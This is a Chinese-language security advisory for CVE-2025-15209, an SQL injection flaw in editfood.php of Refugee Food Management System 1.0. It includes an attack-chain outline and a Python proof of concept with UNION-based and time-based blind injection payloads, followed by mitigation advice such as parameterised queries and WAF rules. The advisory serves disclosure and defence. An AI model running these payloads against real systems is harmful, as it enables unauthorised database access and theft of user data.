CVE-2025-15209: Refugee Food Management System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15209

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Refugee Food Management System 1.0

漏洞概述

CVE-2025-15209是code-projects平台上Refugee Food Management System 1.0版本中的一个中等严重性SQL注入漏洞。该漏洞存在于/home/editfood.php文件中，攻击者可以通过操纵URL中的a/b/c/d参数来执行恶意SQL语句。由于该漏洞的攻击复杂度较低且利用代码已公开，远程攻击者无需高深技术即可利用此漏洞。漏洞影响系统的机密性、完整性和可用性，均为低程度影响。对于部署了该系统的组织机构，建议尽快采取修复措施以防止潜在的数据泄露和系统损害。

技术细节

该SQL注入漏洞源于editfood.php文件对用户输入参数缺乏充分的过滤和验证。攻击者可以通过构造特殊的URL参数a、b、c或d来注入SQL代码。由于系统使用了动态SQL查询且未使用参数化查询或预编译语句，恶意SQL语句会被数据库执行。攻击者可能利用UNION SELECT、布尔盲注或时间盲注等技术来提取数据库中的敏感信息，包括用户凭证、管理员数据或其他业务数据。由于CVSS向量显示需要低权限认证，攻击者可能需要先获取系统普通用户账号，但部分参数可能无需认证即可被操纵。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标网站使用的Refugee Food Management System 1.0版本

STEP 2

步骤2

访问漏洞页面：访问/home/editfood.php端点

STEP 3

步骤3

构造恶意请求：构造包含SQL注入载荷的URL参数(a/b/c/d)

STEP 4

步骤4

注入执行：通过UNION注入或盲注技术执行恶意SQL语句

STEP 5

步骤5

数据提取：提取数据库中的敏感信息如用户数据、密码哈希等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-15209 PoC - SQL Injection in Refugee Food Management System
# Target: /home/editfood.php
# Parameter: a/b/c/d

target_url = "http://target.com/home/editfood.php"

# Basic SQL Injection PoC using UNION-based injection
payload = "' UNION SELECT 1,2,3,4,5,6,7,8-- -"
params = {'a': payload}

try:
    response = requests.get(target_url, params=params, timeout=10)
    if response.status_code == 200:
        print(f"[+] Target is potentially vulnerable")
        print(f"[+] Response length: {len(response.text)}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Blind SQL Injection PoC
def blind_sqli_test(url, param):
    # Test if parameter is vulnerable by checking response time difference
    true_payload = f"'; SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END-- -"
    false_payload = f"'; SELECT CASE WHEN (1=2) THEN SLEEP(5) ELSE 0 END-- -"
    
    try:
        start = time.time()
        requests.get(url, params={param: true_payload}, timeout=15)
        true_time = time.time() - start
        
        start = time.time()
        requests.get(url, params={param: false_payload}, timeout=15)
        false_time = time.time() - start
        
        if true_time > false_time + 3:
            return True
    except:
        pass
    return False

影响范围

Refugee Food Management System 1.0

防御指南

临时缓解措施

立即停止使用受影响版本的Refugee Food Management System，或应用参数化查询重构editfood.php中的数据库操作代码。对所有用户可控输入实施白名单过滤，限制应用程序的数据库权限，并考虑部署WAF规则拦截SQL注入特征的攻击流量。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15209
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15209
3 Details https://www.cvedetails.com/cve/CVE-2025-15209/
4 VulDB https://vuldb.com/cve/CVE-2025-15209
5 Link https://code-projects.org/
6 Link https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_editfood.php.md
7 Link https://vuldb.com/?ctiid.338594
8 Link https://vuldb.com/?id.338594
9 Link https://vuldb.com/?submit.722803
10 Link https://vuldb.com/?submit.724713
11 Link https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_editfood.php.md